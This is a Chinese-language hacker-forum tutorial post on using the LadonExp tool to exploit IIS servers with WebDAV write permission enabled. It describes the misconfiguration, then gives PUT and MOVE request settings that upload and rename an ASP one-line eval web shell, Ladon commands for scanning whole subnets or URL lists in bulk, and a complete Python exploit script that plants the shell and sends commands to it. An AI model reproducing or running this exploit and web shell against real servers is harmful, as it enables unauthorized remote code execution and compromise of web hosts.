• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

〖付工具〗LadonExp使用IIS写权限Webdav漏洞GetShell


H4CK

Recommended Posts

LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。

漏洞成因

该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。

IIS配置

1 启用webdav组件
2 目录给写权限(为了方便直接eveyone完全写入权限)
3 脚本资源访问权限(不然MOVE失败即无法GetShell)

image

image

漏洞复现

使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video

LadonExp配置PUT

功能:上传123.TXT
Target: http://192.168.1.22
Method: Put
addurl: 123.txt
Data: <%eval request(k8gege)%>
点击buildexe->TestExe测试
成功返回 Created

image

LadonExp配置MOVE

功能:将123.txt改名1.asp
Target: http://192.168.1.22/123.txt
Method: Move
Destination: http://192.168.1.22/1.asp

点击buildexe->TestExe测试
成功返回 Created

image

PS: 当然也可以直接PUT写入可解析的其它格式,也不一定非得先PUT再MOVE才能GetShell

Ladon批量

扫描C段,当然也可以A段B段

1
2
Ladon 192.168.1.1/c 生成.dll
Ladon 192.168.1.1/24 生成.dll

TXT批量

url.txt里放批量地址,不在同一个段的,示例如下
http://192.168.1.1
http://192.10.5.8:808

1
Ladon 生成.dll

Exploit

Python实现利用代码

#encoding="utf-8"
import requests

put_url = 'http://192.168.1.22/2.txt'
move_url = 'http://192.168.1.22/2.txt'
move_headers = {
    'Destination':'http://192.168.1.22/shell.asp'
}

put_data = "<%eval request('k8gege')%>"

post_data = {
    '#':''
}
try:
    response = requests.request('PUT',url=put_url,data=put_data)
    if response.status_code == 200:
        response = requests.request('MOVE',url=move_url,headers=move_headers)
        if response.status_code == 207:
            response = requests.post(url='http://192.168.1.22/shell.asp',data=post_data)
            print(response.content.decode("gb2312"))
        else:
            print(response.status_code)
except:
    pass

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now